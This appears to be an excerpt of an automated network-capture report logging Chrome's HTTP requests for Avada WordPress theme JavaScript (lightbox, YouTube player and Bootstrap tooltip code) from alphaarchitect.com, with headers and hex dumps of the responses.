                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 65 6e 67 74 68 3b 74 2b 2b 29 72 2b 3d 53 74 72 69 6e 67 28 73 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 2e 22 2b 6e 5b 74 5d 29 3b 69 3d 2f 68 74 74 70 28 73 3f 29 3a 5c 2f 5c 2f 28 77 77 77 5c 2e 29 3f 76 69 6d 65 6f 2e 63 6f 6d 5c 2f 28 5c 64 2b 29 2f 2c 73 2e 6d 61 74 63 68 28 69 29 26 26 28 72 3d 31 29 2c 69 3d 2f 5e 2e 2a 28 28 79 6f 75 74 75 2e 62 65 5c 2f 29 7c 28 76 5c 2f 29 7c 28 5c 2f 75 5c 2f 5c 77 5c 2f 29 7c 28 65 6d 62 65 64 5c 2f 29 7c 28 77 61 74 63 68 5c 3f 29 29 5c 3f 3f 76 3f 3d 3f 28 5b 5e 23 5c 26 5c 3f 5d 2a 29 2e 2a 2f 2c 73 2e 6d 61 74 63 68 28 69 29 26 26 28 72 3d 31 29 2c 2d 31 2a 6e 2e 6c 65 6e 67 74 68 3d 3d 3d 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 26 26 28 6a 51 75 65 72 79 28 74 68 69 73
                                                                                                                                                                                                                                                                        Data Ascii: ength;t++)r+=String(s).toLowerCase().indexOf("."+n[t]);i=/http(s?):\/\/(www\.)?vimeo.com\/(\d+)/,s.match(i)&&(r=1),i=/^.*((youtu.be\/)|(v\/)|(\/u\/\w\/)|(embed\/)|(watch\?))\??v?=?([^#\&\?]*).*/,s.match(i)&&(r=1),-1*n.length===parseInt(r,10)&&(jQuery(this
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 22 5d 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 68 72 65 66 22 29 3b 22 22 21 3d 3d 74 26 26 76 6f 69 64 20 30 21 3d 3d 74 26 26 28 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 5b 22 73 69 6e 67 6c 65 5f 22 2b 6f 5d 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 69 4c 69 67 68 74 42 6f 78 28 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67 68 74 42 6f 78 2e 70 72 65 70 61 72 65 5f 6f 70 74 69 6f 6e 73 28 22 73 69 6e 67 6c 65 22 29 29 2c 6f 2b 2b 29 7d 29 2c 74 2e 66 69 6e 64 28 22 23 6c 69 67 68 74 62 6f 78 2d 6c 69 6e 6b 2c 20 2e 6c 69 67 68 74 62 6f 78 2d 6c 69 6e 6b 2c 20 2e 66 75 73 69 6f 6e 2d 6c 69 67 68 74 62 6f 78 2d 6c 69 6e 6b 22 29 2e 65 61 63 68 28 66
                                                                                                                                                                                                                                                                        Data Ascii: "]').each(function(){var t=jQuery(this).attr("href");""!==t&&void 0!==t&&(window.$ilInstances["single_"+o]=jQuery(this).iLightBox(window.avadaLightBox.prepare_options("single")),o++)}),t.find("#lightbox-link, .lightbox-link, .fusion-lightbox-link").each(f
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 79 28 74 68 69 73 29 2e 68 61 73 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 6e 6f 2d 6c 69 67 68 74 62 6f 78 22 29 7c 7c 28 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 63 61 70 74 69 6f 6e 22 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 22 70 2e 77 70 2d 63 61 70 74 69 6f 6e 2d 74 65 78 74 22 29 2e 74 65 78 74 28 29 29 2c 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 5b 22 73 69 6e 67 6c 65 5f 22 2b 6f 5d 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 69 4c 69 67 68 74 42 6f 78 28 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67 68 74 42 6f 78 2e 70 72 65 70 61 72 65 5f 6f 70 74 69 6f 6e 73 28 22 70 6f 73 74 22 29 29 2c 6f 2b 2b 29 7d 29 7d 2c 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67
                                                                                                                                                                                                                                                                        Data Ascii: y(this).hasClass("fusion-no-lightbox")||(jQuery(this).attr("data-caption",jQuery(this).parent().find("p.wp-caption-text").text()),window.$ilInstances["single_"+o]=jQuery(this).iLightBox(window.avadaLightBox.prepare_options("post")),o++)})},window.avadaLig
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 69 6f 6e 4c 69 67 68 74 62 6f 78 56 61 72 73 2e 6c 69 67 68 74 62 6f 78 5f 74 69 74 6c 65 2c 73 70 65 65 64 3a 65 5b 66 75 73 69 6f 6e 4c 69 67 68 74 62 6f 78 56 61 72 73 2e 6c 69 67 68 74 62 6f 78 5f 61 6e 69 6d 61 74 69 6f 6e 5f 73 70 65 65 64 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7d 2c 70 61 74 68 3a 66 75 73 69 6f 6e 4c 69 67 68 74 62 6f 78 56 61 72 73 2e 6c 69 67 68 74 62 6f 78 5f 70 61 74 68 2c 63 6f 6e 74 72 6f 6c 73 3a 7b 73 6c 69 64 65 73 68 6f 77 3a 69 2c 61 72 72 6f 77 73 3a 66 75 73 69 6f 6e 4c 69 67 68 74 62 6f 78 56 61 72 73 2e 6c 69 67 68 74 62 6f 78 5f 61 72 72 6f 77 73 7d 2c 73 6c 69 64 65 73 68 6f 77 3a 7b 70 61 75 73 65 54 69 6d 65 3a 66 75 73 69 6f 6e 4c 69 67 68 74 62 6f 78 56 61 72 73 2e 6c 69 67 68 74 62 6f 78 5f 73 6c 69 64
                                                                                                                                                                                                                                                                        Data Ascii: ionLightboxVars.lightbox_title,speed:e[fusionLightboxVars.lightbox_animation_speed.toLowerCase()]},path:fusionLightboxVars.lightbox_path,controls:{slideshow:i,arrows:fusionLightboxVars.lightbox_arrows},slideshow:{pauseTime:fusionLightboxVars.lightbox_slid
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC892INData Raw: 6b 49 64 3d 74 29 2c 6f 2e 74 65 78 74 3d 77 69 6e 64 6f 77 2e 66 75 73 69 6f 6e 4c 69 67 68 74 62 6f 78 56 61 72 73 2e 6c 31 30 6e 2c 6f 7d 2c 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67 68 74 42 6f 78 2e 72 65 66 72 65 73 68 5f 6c 69 67 68 74 62 6f 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67 68 74 42 6f 78 2e 73 65 74 5f 74 69 74 6c 65 5f 61 6e 64 5f 63 61 70 74 69 6f 6e 28 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 69 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 72 65 66 72 65 73 68 22 29 26 26 69 2e 72 65 66 72 65 73 68 28 29 7d 29 7d 2c 6a 51 75 65 72 79 28 64 6f 63
                                                                                                                                                                                                                                                                        Data Ascii: kId=t),o.text=window.fusionLightboxVars.l10n,o},window.avadaLightBox.refresh_lightbox=function(){"use strict";window.avadaLightBox.set_title_and_caption(),jQuery.each(window.$ilInstances,function(t,i){i.hasOwnProperty("refresh")&&i.refresh()})},jQuery(doc
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        112192.168.2.449870141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC837OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-youtube.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-10c2"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147817
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba1ed8fd43a5-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC877INData Raw: 31 30 63 32 0d 0a 76 61 72 20 70 72 65 76 43 61 6c 6c 62 61 63 6b 3d 77 69 6e 64 6f 77 2e 6f 6e 59 6f 75 54 75 62 65 50 6c 61 79 65 72 41 50 49 52 65 61 64 79 2c 66 75 73 69 6f 6e 54 69 6d 65 6f 75 74 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 72 65 67 69 73 74 65 72 59 6f 75 74 75 62 65 50 6c 61 79 65 72 73 28 65 29 7b 21 30 3d 3d 3d 77 69 6e 64 6f 77 2e 79 74 5f 76 69 64 5f 65 78 69 73 74 73 26 26 28 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 3d 5b 5d 2c 6a 51 75 65 72 79 28 22 2e 74 66 73 2d 73 6c 69 64 65 72 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2c 61 3d 74 2e 66 69 6e 64 28 22 5b 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 5d 22 29 2e 66
                                                                                                                                                                                                                                                                        Data Ascii: 10c2var prevCallback=window.onYouTubePlayerAPIReady,fusionTimeout=[];function registerYoutubePlayers(e){!0===window.yt_vid_exists&&(window.$youtube_players=[],jQuery(".tfs-slider").each(function(){var t=jQuery(this),a=t.find("[data-youtube-video-id]").f
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 76 65 22 29 29 26 26 28 28 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 29 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 69 66 72 61 6d 65 5f 61 70 69 22 2c 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 6e 59 6f 75 54 75 62 65 50 6c 61 79 65 72 41 50 49 52 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7b 77 69 6e 64 6f 77 2e 59 54 52 65 61 64 79 28 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 6e 50 6c 61 79 65 72 53 74 61 74 65 43 68 61 6e 67 65 28 65
                                                                                                                                                                                                                                                                        Data Ascii: ve"))&&((e=document.createElement("script")).src="https://www.youtube.com/iframe_api",(t=document.getElementsByTagName("script")[0]).parentNode.insertBefore(e,t))}function onYouTubePlayerAPIReadyCallback(){window.YTReady(!0)}function onPlayerStateChange(e
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 29 7b 76 6f 69 64 20 30 3d 3d 3d 66 75 73 69 6f 6e 54 69 6d 65 6f 75 74 5b 65 5d 26 26 28 66 75 73 69 6f 6e 54 69 6d 65 6f 75 74 5b 65 5d 3d 30 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f 69 64 20 30 21 3d 3d 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 26 26 76 6f 69 64 20 30 21 3d 3d 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 5b 65 5d 26 26 76 6f 69 64 20 30 21 3d 3d 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 5b 65 5d 2e 70 6c 61 79 56 69 64 65 6f 3f 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 5b 65 5d 2e 70 6c 61 79 56 69 64 65 6f 28 29 3a 35 3e 2b 2b 66 75 73 69 6f 6e 54 69 6d 65 6f 75 74 5b 65 5d 26 26 66 75 73 69 6f
                                                                                                                                                                                                                                                                        Data Ascii: ){void 0===fusionTimeout[e]&&(fusionTimeout[e]=0),setTimeout(function(){void 0!==window.$youtube_players&&void 0!==window.$youtube_players[e]&&void 0!==window.$youtube_players[e].playVideo?window.$youtube_players[e].playVideo():5>++fusionTimeout[e]&&fusio
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC683INData Raw: 26 6f 2e 73 65 74 50 6c 61 79 62 61 63 6b 51 75 61 6c 69 74 79 28 22 68 64 37 32 30 22 29 29 7d 7d 3b 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 66 75 6c 6c 77 69 64 74 68 2e 76 69 64 65 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 66 69 6e 64 28 22 5b 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 5d 22 29 26 26 28 77 69 6e 64 6f 77 2e 79 74 5f 76 69 64 5f 65 78 69 73 74 73 3d 21 30 29 7d 29 2c 65 3d 6a 51 75 65 72 79 28 22 69 66 72 61 6d 65 22 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29
                                                                                                                                                                                                                                                                        Data Ascii: &o.setPlaybackQuality("hd720"))}};jQuery(document).ready(function(){var e;jQuery(".fusion-fullwidth.video-background").each(function(){jQuery(this).find("[data-youtube-video-id]")&&(window.yt_vid_exists=!0)}),e=jQuery("iframe"),jQuery.each(e,function(e,t)
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        113192.168.2.449871141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC626OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.tooltip.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-2a6d"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147817
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba1eedfe4364-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC877INData Raw: 32 61 36 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 5b 22 73 61 6e 69 74 69 7a 65 22 2c 22 77 68 69 74 65 4c 69 73 74 22 2c 22 73 61 6e 69 74 69 7a 65 46 6e 22 5d 2c 69 3d 5b 22 62 61 63 6b 67 72 6f 75 6e 64 22 2c 22 63 69 74 65 22 2c 22 68 72 65 66 22 2c 22 69 74 65 6d 74 79 70 65 22 2c 22 6c 6f 6e 67 64 65 73 63 22 2c 22 70 6f 73 74 65 72 22 2c 22 73 72 63 22 2c 22 78 6c 69 6e 6b 3a 68 72 65 66 22 5d 2c 6f 3d 7b 22 2a 22 3a 5b 22 63 6c 61 73 73 22 2c 22 64 69 72 22 2c 22 69 64 22 2c 22 6c 61 6e 67 22 2c 22 72 6f 6c 65 22 2c 2f 5e 61 72 69 61 2d 5b 5c 77 2d 5d 2a 24 2f 69 5d 2c 61 3a 5b 22 74 61 72 67 65 74 22 2c 22 68 72 65 66 22 2c 22 74 69 74 6c 65 22 2c 22 72 65 6c 22 5d 2c 61 72 65 61 3a
                                                                                                                                                                                                                                                                        Data Ascii: 2a6d!function(t){"use strict";var e=["sanitize","whiteList","sanitizeFn"],i=["background","cite","href","itemtype","longdesc","poster","src","xlink:href"],o={"*":["class","dir","id","lang","role",/^aria-[\w-]*$/i],a:["target","href","title","rel"],area:
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 45 78 70 7d 29 2c 6c 3d 30 2c 70 3d 61 2e 6c 65 6e 67 74 68 3b 6c 3c 70 3b 6c 2b 2b 29 69 66 28 72 2e 6d 61 74 63 68 28 61 5b 6c 5d 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 69 2c 6f 29 7b 69 66 28 30 3d 3d 3d 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 3b 69 66 28 6f 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6f 29 72 65 74 75 72 6e 20 6f 28 65 29 3b 69 66 28 21 64 6f 63 75 6d 65 6e 74 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 7c 7c 21 64 6f 63 75 6d 65 6e 74 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2e 63 72 65 61 74 65 48 54 4d 4c 44 6f 63 75 6d 65 6e 74 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69
                                                                                                                                                                                                                                                                        Data Ascii: Exp}),l=0,p=a.length;l<p;l++)if(r.match(a[l]))return!0;return!1}function a(e,i,o){if(0===e.length)return e;if(o&&"function"==typeof o)return o(e);if(!document.implementation||!document.implementation.createHTMLDocument)return e;var n=document.implementati
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 74 2e 69 73 46 75 6e 63 74 69 6f 6e 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 76 69 65 77 70 6f 72 74 29 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 76 69 65 77 70 6f 72 74 2e 63 61 6c 6c 28 74 68 69 73 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 29 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 76 69 65 77 70 6f 72 74 2e 73 65 6c 65 63 74 6f 72 7c 7c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 76 69 65 77 70 6f 72 74 29 2c 74 68 69 73 2e 69 6e 53 74 61 74 65 3d 7b 63 6c 69 63 6b 3a 21 31 2c 68 6f 76 65 72 3a 21 31 2c 66 6f 63 75 73 3a 21 31 7d 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 69 6e 73 74 61 6e 63 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 65 6c 65 63 74 6f 72 29 74 68 72
                                                                                                                                                                                                                                                                        Data Ascii: t.isFunction(this.options.viewport)?this.options.viewport.call(this,this.$element):this.options.viewport.selector||this.options.viewport),this.inState={click:!1,hover:!1,focus:!1},this.$element[0]instanceof document.constructor&&!this.options.selector)thr
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 26 26 74 2e 65 61 63 68 28 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 29 7b 69 5b 74 5d 21 3d 6f 26 26 28 65 5b 74 5d 3d 6f 29 7d 29 2c 65 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3f 65 3a 74 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2e 64 61 74 61 28 22 62 73 2e 22 2b 74 68 69 73 2e 74 79 70 65 29 3b 69 66 28 69 7c 7c 28 69 3d 6e 65 77 20 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2c 74 68 69 73 2e 67 65 74 44 65 6c 65 67 61 74 65 4f 70 74
                                                                                                                                                                                                                                                                        Data Ascii: ;return this._options&&t.each(this._options,function(t,o){i[t]!=o&&(e[t]=o)}),e},l.prototype.enter=function(e){var i=e instanceof this.constructor?e:t(e.currentTarget).data("bs."+this.type);if(i||(i=new this.constructor(e.currentTarget,this.getDelegateOpt
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 20 69 3d 74 2e 63 6f 6e 74 61 69 6e 73 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 29 3b 69 66 28 65 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 21 69 29 72 65 74 75 72 6e 3b 76 61 72 20 6f 3d 74 68 69 73 2c 6e 3d 74 68 69 73 2e 74 69 70 28 29 2c 73 3d 74 68 69 73 2e 67 65 74 55 49 44 28 74 68 69 73 2e 74 79 70 65 29 3b 74 68 69 73 2e 73 65 74 43 6f 6e 74 65 6e 74 28 29 2c 6e 2e 61 74 74 72 28 22 69 64 22 2c 73 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 22 2c 73 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 61 6e 69
                                                                                                                                                                                                                                                                        Data Ascii: i=t.contains(this.$element[0].ownerDocument.documentElement,this.$element[0]);if(e.isDefaultPrevented()||!i)return;var o=this,n=this.tip(),s=this.getUID(this.type);this.setContent(),n.attr("id",s),this.$element.attr("aria-describedby",s),this.options.ani
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 74 69 70 28 29 2c 6e 3d 6f 5b 30 5d 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 73 3d 6f 5b 30 5d 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 72 3d 70 61 72 73 65 49 6e 74 28 6f 2e 63 73 73 28 22 6d 61 72 67 69 6e 2d 74 6f 70 22 29 2c 31 30 29 2c 61 3d 70 61 72 73 65 49 6e 74 28 6f 2e 63 73 73 28 22 6d 61 72 67 69 6e 2d 6c 65 66 74 22 29 2c 31 30 29 3b 69 73 4e 61 4e 28 72 29 26 26 28 72 3d 30 29 2c 69 73 4e 61 4e 28 61 29 26 26 28 61 3d 30 29 2c 65 2e 74 6f 70 2b 3d 72 2c 65 2e 6c 65 66 74 2b 3d 61 2c 74 2e 6f 66 66 73 65 74 2e 73 65 74 4f 66 66 73 65 74 28 6f 5b 30 5d 2c 74 2e 65 78 74 65 6e 64 28 7b 75 73 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6f 2e 63 73 73 28 7b 74 6f 70 3a 4d
                                                                                                                                                                                                                                                                        Data Ascii: unction(e,i){var o=this.tip(),n=o[0].offsetWidth,s=o[0].offsetHeight,r=parseInt(o.css("margin-top"),10),a=parseInt(o.css("margin-left"),10);isNaN(r)&&(r=0),isNaN(a)&&(a=0),e.top+=r,e.left+=a,t.offset.setOffset(o[0],t.extend({using:function(t){o.css({top:M
